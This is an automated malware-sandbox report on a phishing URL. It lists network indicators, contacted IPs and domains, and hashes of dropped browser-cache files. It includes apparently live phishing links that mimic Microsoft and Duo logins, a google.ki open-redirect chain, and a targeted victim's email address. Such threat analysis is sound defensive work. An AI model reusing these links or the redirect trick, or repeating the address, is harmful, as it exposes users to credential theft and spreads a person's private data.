                                                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8e45aa726acf4857/1731908848539/e71f142feaf079649ccaf46b60025186ccfc7d9bc8d0652e628e1a0fa374fd37/GHRH_yeYijJgzEtfalse
                                                                                                        high
                                                                                                        https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.cssfalse
                                                                                                          high
                                                                                                          https://supernova.hethantac.com/3XdZQxT/#MJamie.Bell@elkamet.comfalse
                                                                                                            unknown
                                                                                                            https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.giffalse
                                                                                                              high
                                                                                                              https://aadcdn.msftauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svgfalse
                                                                                                                high
                                                                                                                https://cisco.login.duosecurity.com/email_first?authkey=ASKAWA9H1311GU747SH0&scid=4873fe428ab243529767cba103466e46&edit=Truefalse
                                                                                                                  high
                                                                                                                  https://cisco.login.duosecurity.com/static/css/page/email-first.css?v=8132cfalse
                                                                                                                    high
                                                                                                                    https://www.google.ki/amp/plimmerton.org.nz/jugz/false
                                                                                                                      high
                                                                                                                      https://ux-asset-commercial.duosecurity.com/customization/account/pjr5mk7gIVVM96clMnJeaB_2v7s7l9mi0IW7F6yfzFw/logo_image.png?versionId=DzI1NMCJNJv6J3By1BhKLYgM8B5W6KuRfalse
                                                                                                                        high
                                                                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e45aa726acf4857/1731908848543/5Iv_qXWII0BR-3-false
                                                                                                                          high
                                                                                                                          https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.jsfalse
                                                                                                                            high
                                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                            https://login.windows-ppe.netchromecache_173.2.dr, chromecache_186.2.drfalse
                                                                                                                              high
                                                                                                                              https://login.microsoftonline.comchromecache_173.2.dr, chromecache_186.2.drfalse
                                                                                                                                high
                                                                                                                                https://duo.com/about/contactchromecache_211.2.dr, chromecache_191.2.drfalse
                                                                                                                                  high
                                                                                                                                  http://knockoutjs.com/chromecache_205.2.dr, chromecache_219.2.drfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/douglascrockford/JSON-jschromecache_205.2.dr, chromecache_210.2.dr, chromecache_198.2.dr, chromecache_219.2.dr, chromecache_216.2.dr, chromecache_221.2.dr, chromecache_235.2.dr, chromecache_220.2.dr, chromecache_193.2.dr, chromecache_229.2.drfalse
                                                                                                                                      high
                                                                                                                                      http://www.opensource.org/licenses/mit-license.php)chromecache_205.2.dr, chromecache_219.2.drfalse
                                                                                                                                        high
                                                                                                                                        http://feross.orgchromecache_210.2.dr, chromecache_216.2.drfalse
                                                                                                                                          high
                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs
                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          18.66.102.12
                                                                                                                                          ux-asset-commercial.duosecurity.comUnited States
                                                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                                                          52.223.1.163
                                                                                                                                          unknownUnited States
                                                                                                                                          8987AMAZONEXPANSIONGBfalse
                                                                                                                                          13.107.246.45
                                                                                                                                          s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                          104.18.94.41
                                                                                                                                          unknownUnited States
                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                          13.107.246.60
                                                                                                                                          s-part-0032.t-0009.t-msedge.netUnited States
                                                                                                                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                          151.101.130.137
                                                                                                                                          code.jquery.comUnited States
                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                          192.185.150.174
                                                                                                                                          plimmerton.org.nzUnited States
                                                                                                                                          46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                          142.250.186.131
                                                                                                                                          www.google.kiUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          142.250.186.132
                                                                                                                                          www.google.comUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          35.190.80.1
                                                                                                                                          a.nel.cloudflare.comUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          104.17.24.14
                                                                                                                                          cdnjs.cloudflare.comUnited States
                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                          104.18.95.41
                                                                                                                                          challenges.cloudflare.comUnited States
                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                          239.255.255.250
                                                                                                                                          unknownReserved
                                                                                                                                          unknownunknownfalse
                                                                                                                                          188.114.97.3
                                                                                                                                          jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ruEuropean Union
                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                          188.114.96.3
                                                                                                                                          supernova.hethantac.comEuropean Union
                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                          152.199.21.175
                                                                                                                                          sni1gl.wpc.omegacdn.netUnited States
                                                                                                                                          15133EDGECASTUSfalse
                                                                                                                                          35.71.186.151
                                                                                                                                          sso-dbbfec7f.sso.duosecurity.comUnited States
                                                                                                                                          237MERIT-AS-14USfalse
                                                                                                                                          IP
                                                                                                                                          192.168.2.16
                                                                                                                                          192.168.2.7
                                                                                                                                          192.168.2.6
                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1557370
                                                                                                                                          Start date and time:2024-11-18 06:46:45 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 4m 47s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                          Sample URL:https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ==
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:14
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal60.phis.win@30/116@55/20
                                                                                                                                          EGA Information:Failed
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          • Number of executed functions: 0
                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 199.232.210.172, 142.250.185.131, 142.250.181.238, 64.233.184.84, 34.104.35.123, 13.107.6.156, 40.126.32.72, 40.126.32.136, 40.126.32.140, 40.126.32.76, 40.126.32.74, 20.190.160.20, 20.190.160.17, 40.126.32.133, 40.126.31.69, 40.126.31.71, 20.190.159.64, 20.190.159.2, 20.190.159.73, 40.126.31.67, 20.190.159.0, 20.190.159.71, 20.190.160.14, 40.126.32.138, 40.126.32.68, 142.250.186.170, 142.250.185.170, 142.250.186.42, 142.250.186.74, 142.250.184.202, 216.58.212.170, 142.250.181.234, 142.250.185.202, 172.217.16.138, 142.250.185.234, 142.250.186.138, 142.250.185.138, 216.58.206.42, 216.58.206.74, 142.250.185.106, 172.217.18.106, 20.50.80.210, 40.126.32.134, 142.250.184.195, 172.217.16.202, 142.250.184.234, 142.250.185.74, 216.58.212.138, 172.217.18.10, 142.250.186.106, 142.250.185.238, 216.58.206.46, 142.250.184.206, 95.101.54.226, 95.101.54.225, 142.251.116.101, 142.251.116.102, 142.251.116.113, 142.251.116.139, 142.251.116.138, 142.251.116.100, 173.194.140.8, 142.250.7
                                                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, r3---sn-q4fzen7l.gvt1.com, ak.privatelink.msidentity.com, a1894.dscb.akamai.net, r3.sn-q4fzen7l.gvt1.com, clients2.google.com, redirector.gvt1.com, login.live.com, update.googleapis.com, login.mso.msidentity.com, clients1.google.com, www.tm.ak.prd.aadg.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, www.tm.ak.prd.aadg.akadns.net, www.tm.v4.a.prd.aadg.akadns.net, b-0004.b-msedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, www.googleapis.com, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, onedscolprdneu05.northeurope.cloudapp.azure.com, nel.measure.office.net.edgesuite.net, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, www.tm.lg.prod.aadmsa.
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          No simulations
                                                                                                                                          No context
                                                                                                                                          No context
                                                                                                                                          No context
                                                                                                                                          No context
                                                                                                                                          No context
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):451968
                                                                                                                                          Entropy (8bit):5.0102415404165095
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:CHZsTLG/6lu8riHP1qmOeMlh+ebMiCB64or:EZmiv1ClhhA6d
                                                                                                                                          MD5:4604E676A0A7D18770853919E24EC465
                                                                                                                                          SHA1:415EF3B2CA0851E00EBAF0D6C9F6213C561AC98F
                                                                                                                                          SHA-256:A075B01D9B015C616511A9E87DA77DA3D9881621DB32F584E4606DDABF1C1100
                                                                                                                                          SHA-512:3D89C21F20772A8BEBDB70B29C42FCA2F6BFFCDA49DFF9D5644F3F3910B7C710A5C20154A7AF5134C9C7A8624A1251B5E56CED9351D87463F31BED8188EB0774
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:BDic.... ....6..._..$.......iy.2...t/...3...5....AF 1362.AF nm.AF pt.AF n1.AF p.AF tc.AF SM.AF M.AF S.AF MS.AF MNR.AF GDS.AF MNT.AF MH.AF MR.AF SZMR.AF MJ.AF MT.AF MY.AF MRZ.AF MN.AF MG.AF RM.AF N.AF MV.AF XM.AF DSM.AF SD.AF G.AF R.AF MNX.AF MRS.AF MD.AF MNRB.AF B.AF ZSMR.AF PM.AF SMNGJ.AF SMN.AF ZMR.AF SMGB.AF MZR.AF GM.AF SMR.AF SMDG.AF RMZ.AF ZM.AF MDG.AF MDT.AF SMNXT.AF SDY.AF LSDG.AF LGDS.AF GLDS.AF UY.AF U.AF DSGNX.AF GNDSX.AF DSG.AF Y.AF GS.AF IEMS.AF YP.AF ZGDRS.AF XGNVDS.AF UT.AF GNDS.AF GVDS.AF MYPS.AF XGNDS.AF TPRY.AF MDSG.AF ZGSDR.AF DYSG.AF PMYTNS.AF AGDS.AF DRZGS.AF PY.AF GSPMDY.AF EGVDS.AF SL.AF GNXDS.AF DSBG.AF IM.AF I.AF MDGS.AF SMY.AF DSGN.AF DSLG.AF GMDS.AF MDSBG.AF SGD.AF IY.AF P.AF DSMG.AF BLZGDRS.AF TR.AF AGSD.AF ZGBDRSL.AF PTRY.AF ASDGV.AF ASM.AF ICANGSD.AF ICAM.AF IKY.AF AMS.AF PMYTRS.AF BZGVDRS.AF SDRBZG.AF GVMDS.AF PSM.AF DGLS.AF GNVXDS.AF AGDSL.AF DGS.AF XDSGNV.AF BZGDRS.AF AM.AF AS.AF A.AF LDSG.AF AGVDS.AF SDG.AF LDSMG.AF EDSMG.AF EY.AF DRSMZG.AF PRYT.AF LZ
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 04:47:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2673
                                                                                                                                          Entropy (8bit):3.9786348233183872
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:88dqOTKK5RH9idAKZdA1FehwiZUklqehAy+3:8DOWER/y
                                                                                                                                          MD5:89B1F1674D60D3EE63EB4F3621FF2445
                                                                                                                                          SHA1:2100092AA3BE26E1B62B86C4D1C344FFB728600E
                                                                                                                                          SHA-256:B3DD59CDCDEF13B2A59B3BC15B077F6DBAD23C585AA489F4D819CDB68559F481
                                                                                                                                          SHA-512:CAC5AEAC1B099C46C70ABE12C14759BC0F18D5236177CF9AC59552D0792808A5321BEAE8766CFC3740D3686AEA97FD64043A6785772537B5A83E13A3099E0B25
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:L..................F.@.. ...$+.,.....IHU}9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrY.-....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.-....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY.-....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY.-..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.-...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........@.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 04:47:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2675
                                                                                                                                          Entropy (8bit):3.995335855140421
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8BdqOTKK5RH9idAKZdA1seh/iZUkAQkqehvy+2:8GOWEH9Qay
                                                                                                                                          MD5:3E8AF69EF1F87DD16C01BCA9AB8BFBB4
                                                                                                                                          SHA1:7F96C2587DA50FEF2A1F4699FEECCA9A123A5D71
                                                                                                                                          SHA-256:90A4EDBD3E725C3E659DCD47E2AFB26280688904FDC4AC5087DD6858E386A9AA
                                                                                                                                          SHA-512:641825ECF8B513CE2DD2ED4512ABD8700FDAA65C8376A6F8B0060C26608E5B31740FA0233D09948D3522D7EA62FC4C09641EEA2816C37B990A705051571AB74E
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:L..................F.@.. ...$+.,......0U}9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrY.-....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.-....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY.-....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY.-..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.-...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........@.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2689
                                                                                                                                          Entropy (8bit):4.004786249018679
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8OdqOTKK5AH9idAKZdA14meh7sFiZUkmgqeh7sZy+BX:8lOWE0nby
                                                                                                                                          MD5:B0E593586DD67B4E0C83F839DE073A91
                                                                                                                                          SHA1:25A44B66D6C737A7A99E3719307106CFF0762A40
                                                                                                                                          SHA-256:DB409A8685A943A9BB8FA959C49C98071192F37DAFBACE1B617685802D2AADF7
                                                                                                                                          SHA-512:430B0BB848BBDF2519A065F5A0761E561141570065D5DA694D4BA50A4F2795B5483BC4086D0ECCE0C72E36CF7155AC5383DFED8D6B763338C2FA9FB3899C3312
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrY.-....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.-....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY.-....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY.-..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........@.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 04:47:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2677
                                                                                                                                          Entropy (8bit):3.9918254598734855
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8OdqOTKK5RH9idAKZdA1TehDiZUkwqehTy+R:8lOWE0Ry
                                                                                                                                          MD5:1B5E29269EC3A4B0B0409811C3F49FB1
                                                                                                                                          SHA1:9A53D4F470262E12DA6049FC107ABC8B140EDE36
                                                                                                                                          SHA-256:8087B7EFEABF8CD120A304ED7894239BF5D474F0D6F61986D154E219A9129EC3
                                                                                                                                          SHA-512:AD49ED78165737B83E0727604736B77850CD9598755907C25CF326905452A6D4274D55CB36672EE31AFD747C1A1C228D057D3F329C6A6C632F6990E262FA8919
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:L..................F.@.. ...$+.,......)U}9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrY.-....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.-....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY.-....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY.-..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.-...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........@.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 04:47:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2677
                                                                                                                                          Entropy (8bit):3.9831558337655095
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8XdqOTKK5RH9idAKZdA1dehBiZUk1W1qehFy+C:88OWE09ly
                                                                                                                                          MD5:10CD334C4650FB414DAD40A472F9B0AA
                                                                                                                                          SHA1:C08B2E18267A612F74C1DD39582556A9D7EF11CB
                                                                                                                                          SHA-256:E918111282F903D28DD4D5D9AB451514CF4A28F09C7AB66F4A8F6D049D87481F
                                                                                                                                          SHA-512:FD6B08DD168347CD3DC117B7F5A0F23EC027DEDAA28BA99CD53B20A38DDB94778FBB853812C297752D31510BB0A87AD8B5E7AAD90E903656D9EAF1929D0E29BC
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:L..................F.@.. ...$+.,......<U}9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrY.-....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.-....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY.-....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY.-..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.-...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........@.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 04:47:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2679
                                                                                                                                          Entropy (8bit):3.990308294854785
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:8rJdqOTKK5RH9idAKZdA1duTeehOuTbbiZUk5OjqehOuTbby+yT+:8SOWEGTfTbxWOvTbby7T
                                                                                                                                          MD5:8A33AFBC4D728528DB2E2A80C8FBA893
                                                                                                                                          SHA1:77E351D616FB52F6F721B4FCEEF9BD3CF90C09F1
                                                                                                                                          SHA-256:F3FFB3D42593BB39CA43CECEDBE5432C27A16FEA84514CBA413770F7F399E6ED
                                                                                                                                          SHA-512:1CE54E8FC1472EFFD132A775E6925B2AE7C735E6C078D7A04BB1D4196CCCCDFC011BD6F512856F51F1731DC332D0E2F862A4561EAFE784C833FC92C0CFA43A50
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:L..................F.@.. ...$+.,...."..U}9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrY.-....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.-....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY.-....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY.-..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.-...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........@.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):48316
                                                                                                                                          Entropy (8bit):5.6346993394709
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
